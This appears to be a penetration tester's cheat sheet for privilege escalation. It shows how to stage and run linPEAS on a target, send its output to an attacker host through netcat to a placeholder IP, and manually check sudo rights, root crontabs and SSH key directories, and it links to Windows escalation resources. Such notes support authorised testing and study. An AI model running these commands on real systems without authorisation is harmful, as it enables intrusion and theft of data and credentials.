Privilege Escalation (PrivEsc)

NOTE: scripts are noisy for any sort of monitoring software, so manual checks may be preferred

🐧 Linux

🔍 linPEAS

# === ATTACKER ===
cd /tmp
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
ip a ; python3 -m http.server 8000

# === TARGET ===
cd /tmp
wget http://<IP_ADDR>:8000/linpeas.sh
chmod +x linpeas.sh
REGEXES="0" ./linpeas.sh 2>&1 | tee linpeas_output.txt

# === KALI ===
scp <USER>@<TARGET>:/tmp/linpeas_output.txt ~/
# NC
nc -l -p <PORT> > ~/linpeas_output.txt
cat /tmp/linpeas_output.txt | nc <ATTACKER_IP> <PORT>
# wait a moment, then CTRL+C

Manual Method

dpkg -l

sudo -l

cat /etc/crontab /var/spool/cron/crontabs/root
ls -la /etc/cron.d/

ls -la /home/*/.ssh/
ls -la /root/.ssh/

🪟 Windows

https://book.hacktricks.wiki/en/windows-hardening/checklist-windows-privilege-escalation.html
https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/
PrivEsc: https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS
PowerShell Scripts: https://github.com/samratashok/nishang
Living Off the Land: https://lolbas-project.github.io/
- /upload
- /download

for %f in ("C:\Program Files", "C:\Program Files (x86)") do @(echo. && echo --- Listing: %~f --- && dir "%~f" /b)

Privilege Escalation (PrivEsc)

🐧 Linux

🔍 linPEAS

Manual Method

🪟 Windows

Priv Esc Exploits